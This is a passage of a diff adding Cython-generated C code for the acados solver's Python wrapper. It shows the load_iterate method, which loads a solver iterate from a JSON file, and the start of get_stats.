__pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "load_iterate") < 0)) __PYX_ERR(0, 330, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_filename = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("load_iterate", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 330, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.load_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_filename); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename) { + PyObject *__pyx_v_json = NULL; + PyObject *__pyx_v_f = NULL; + PyObject *__pyx_v_solution = NULL; + PyObject *__pyx_v_key = NULL; + PyObject *__pyx_v_field = NULL; + PyObject *__pyx_v_stage = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + PyObject *__pyx_t_13 = NULL; + Py_ssize_t __pyx_t_14; + Py_ssize_t __pyx_t_15; + int __pyx_t_16; + PyObject *(*__pyx_t_17)(PyObject *); + PyObject *__pyx_t_18 = NULL; + PyObject *__pyx_t_19 = NULL; + PyObject *__pyx_t_20 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("load_iterate", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":334 + * Loads the iterate stored in json file with filename into the ocp solver. + * """ + * import json # <<<<<<<<<<<<<< + * if not os.path.isfile(filename): + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_json, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 334, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_json = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":335 + * """ + * import json + * if not os.path.isfile(filename): # <<<<<<<<<<<<<< + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_os); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_path); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isfile); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_filename}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_6 = (!__pyx_t_5); + if (unlikely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":336 + * import json + * if not os.path.isfile(filename): + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) # <<<<<<<<<<<<<< + * + * with open(filename, 'r') as f: + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_os); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_path); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_join); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_os); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_getcwd); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_8))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_8); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_8); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_8, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_7, }; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_8, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } + __pyx_t_8 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_8, __pyx_t_3, __pyx_v_filename}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_2 = PyNumber_Add(__pyx_kp_u_load_iterate_failed_file_does_no, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 336, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":335 + * """ + * import json + * if not os.path.isfile(filename): # <<<<<<<<<<<<<< + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":338 + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + * with open(filename, 'r') as f: # <<<<<<<<<<<<<< + * solution = json.load(f) + * + */ + /*with:*/ { + __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_filename); + __Pyx_GIVEREF(__pyx_v_filename); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_filename); + __Pyx_INCREF(__pyx_n_u_r); + __Pyx_GIVEREF(__pyx_n_u_r); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_r); + __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_open, __pyx_t_1, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_9 = __Pyx_PyObject_LookupSpecial(__pyx_t_2, __pyx_n_s_exit); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __pyx_t_3 = __Pyx_PyObject_LookupSpecial(__pyx_t_2, __pyx_n_s_enter); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 338, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_8, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 338, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = __pyx_t_1; + __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + /*try:*/ { + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_10, &__pyx_t_11, &__pyx_t_12); + __Pyx_XGOTREF(__pyx_t_10); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + /*try:*/ { + __pyx_v_f = __pyx_t_3; + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":339 + * + * with open(filename, 'r') as f: + * solution = json.load(f) # <<<<<<<<<<<<<< + * + * for key in solution.keys(): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_json, __pyx_n_s_load); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 339, __pyx_L8_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_f}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 339, __pyx_L8_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_v_solution = __pyx_t_3; + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":338 + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + * with open(filename, 'r') as f: # <<<<<<<<<<<<<< + * solution = json.load(f) + * + */ + } + __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; + goto __pyx_L13_try_end; + __pyx_L8_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + /*except:*/ { + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.load_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1) < 0) __PYX_ERR(0, 338, __pyx_L10_except_error) + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + __pyx_t_8 = PyTuple_Pack(3, __pyx_t_3, __pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 338, __pyx_L10_except_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_13 = __Pyx_PyObject_Call(__pyx_t_9, __pyx_t_8, NULL); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 338, __pyx_L10_except_error) + __Pyx_GOTREF(__pyx_t_13); + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_13); + __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; + if (__pyx_t_6 < 0) __PYX_ERR(0, 338, __pyx_L10_except_error) + __pyx_t_5 = (!__pyx_t_6); + if (unlikely(__pyx_t_5)) { + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ErrRestoreWithState(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_t_3 = 0; __pyx_t_2 = 0; __pyx_t_1 = 0; + __PYX_ERR(0, 338, __pyx_L10_except_error) + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L9_exception_handled; + } + __pyx_L10_except_error:; + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + goto __pyx_L1_error; + __pyx_L9_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + __pyx_L13_try_end:; + } + } + /*finally:*/ { + /*normal exit:*/{ + if (__pyx_t_9) { + __pyx_t_12 = __Pyx_PyObject_Call(__pyx_t_9, __pyx_tuple__17, NULL); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_12); + __Pyx_DECREF(__pyx_t_12); __pyx_t_12 = 0; + } + goto __pyx_L7; + } + __pyx_L7:; + } + goto __pyx_L17; + __pyx_L4_error:; + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + goto __pyx_L1_error; + __pyx_L17:; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":341 + * solution = json.load(f) + * + * for key in solution.keys(): # <<<<<<<<<<<<<< + * (field, stage) = key.split('_') + * self.set(int(stage), field, np.array(solution[key])) + */ + __pyx_t_14 = 0; + if (unlikely(!__pyx_v_solution)) { __Pyx_RaiseUnboundLocalError("solution"); __PYX_ERR(0, 341, __pyx_L1_error) } + if (unlikely(__pyx_v_solution == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "keys"); + __PYX_ERR(0, 341, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_dict_iterator(__pyx_v_solution, 0, __pyx_n_s_keys, (&__pyx_t_15), (&__pyx_t_4)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 341, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_1); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + while (1) { + __pyx_t_16 = __Pyx_dict_iter_next(__pyx_t_1, __pyx_t_15, &__pyx_t_14, &__pyx_t_2, NULL, NULL, __pyx_t_4); + if (unlikely(__pyx_t_16 == 0)) break; + if (unlikely(__pyx_t_16 == -1)) __PYX_ERR(0, 341, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_key, __pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":342 + * + * for key in solution.keys(): + * (field, stage) = key.split('_') # <<<<<<<<<<<<<< + * self.set(int(stage), field, np.array(solution[key])) + * + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_v_key, __pyx_n_s_split); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = NULL; + __pyx_t_16 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_16 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_8, __pyx_n_u__15}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_16, 1+__pyx_t_16); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { + PyObject* sequence = __pyx_t_2; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(0, 342, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + if (likely(PyTuple_CheckExact(sequence))) { + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); + } else { + __pyx_t_3 = PyList_GET_ITEM(sequence, 0); + __pyx_t_8 = PyList_GET_ITEM(sequence, 1); + } + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + #else + __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } else { + Py_ssize_t index = -1; + __pyx_t_7 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_17 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); + index = 0; __pyx_t_3 = __pyx_t_17(__pyx_t_7); if (unlikely(!__pyx_t_3)) goto __pyx_L20_unpacking_failed; + __Pyx_GOTREF(__pyx_t_3); + index = 1; __pyx_t_8 = __pyx_t_17(__pyx_t_7); if (unlikely(!__pyx_t_8)) goto __pyx_L20_unpacking_failed; + __Pyx_GOTREF(__pyx_t_8); + if (__Pyx_IternextUnpackEndCheck(__pyx_t_17(__pyx_t_7), 2) < 0) __PYX_ERR(0, 342, __pyx_L1_error) + __pyx_t_17 = NULL; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L21_unpacking_done; + __pyx_L20_unpacking_failed:; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_17 = NULL; + if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); + __PYX_ERR(0, 342, __pyx_L1_error) + __pyx_L21_unpacking_done:; + } + __Pyx_XDECREF_SET(__pyx_v_field, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_XDECREF_SET(__pyx_v_stage, __pyx_t_8); + __pyx_t_8 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":343 + * for key in solution.keys(): + * (field, stage) = key.split('_') + * self.set(int(stage), field, np.array(solution[key])) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_set); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_3 = __Pyx_PyNumber_Int(__pyx_v_stage); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_18, __pyx_n_s_np); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_18); + __pyx_t_19 = __Pyx_PyObject_GetAttrStr(__pyx_t_18, __pyx_n_s_array); if (unlikely(!__pyx_t_19)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_19); + __Pyx_DECREF(__pyx_t_18); __pyx_t_18 = 0; + if (unlikely(!__pyx_v_solution)) { __Pyx_RaiseUnboundLocalError("solution"); __PYX_ERR(0, 343, __pyx_L1_error) } + __pyx_t_18 = __Pyx_PyObject_GetItem(__pyx_v_solution, __pyx_v_key); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_18); + __pyx_t_20 = NULL; + __pyx_t_16 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_19))) { + __pyx_t_20 = PyMethod_GET_SELF(__pyx_t_19); + if (likely(__pyx_t_20)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_19); + __Pyx_INCREF(__pyx_t_20); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_19, function); + __pyx_t_16 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_20, __pyx_t_18}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_19, __pyx_callargs+1-__pyx_t_16, 1+__pyx_t_16); + __Pyx_XDECREF(__pyx_t_20); __pyx_t_20 = 0; + __Pyx_DECREF(__pyx_t_18); __pyx_t_18 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_19); __pyx_t_19 = 0; + } + __pyx_t_19 = NULL; + __pyx_t_16 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_8))) { + __pyx_t_19 = PyMethod_GET_SELF(__pyx_t_8); + if (likely(__pyx_t_19)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_8); + __Pyx_INCREF(__pyx_t_19); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_8, function); + __pyx_t_16 = 1; + } + } + { + PyObject *__pyx_callargs[4] = {__pyx_t_19, __pyx_t_3, __pyx_v_field, __pyx_t_7}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_8, __pyx_callargs+1-__pyx_t_16, 3+__pyx_t_16); + __Pyx_XDECREF(__pyx_t_19); __pyx_t_19 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_18); + __Pyx_XDECREF(__pyx_t_19); + __Pyx_XDECREF(__pyx_t_20); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.load_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_json); + __Pyx_XDECREF(__pyx_v_f); + __Pyx_XDECREF(__pyx_v_solution); + __Pyx_XDECREF(__pyx_v_key); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF(__pyx_v_stage); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ 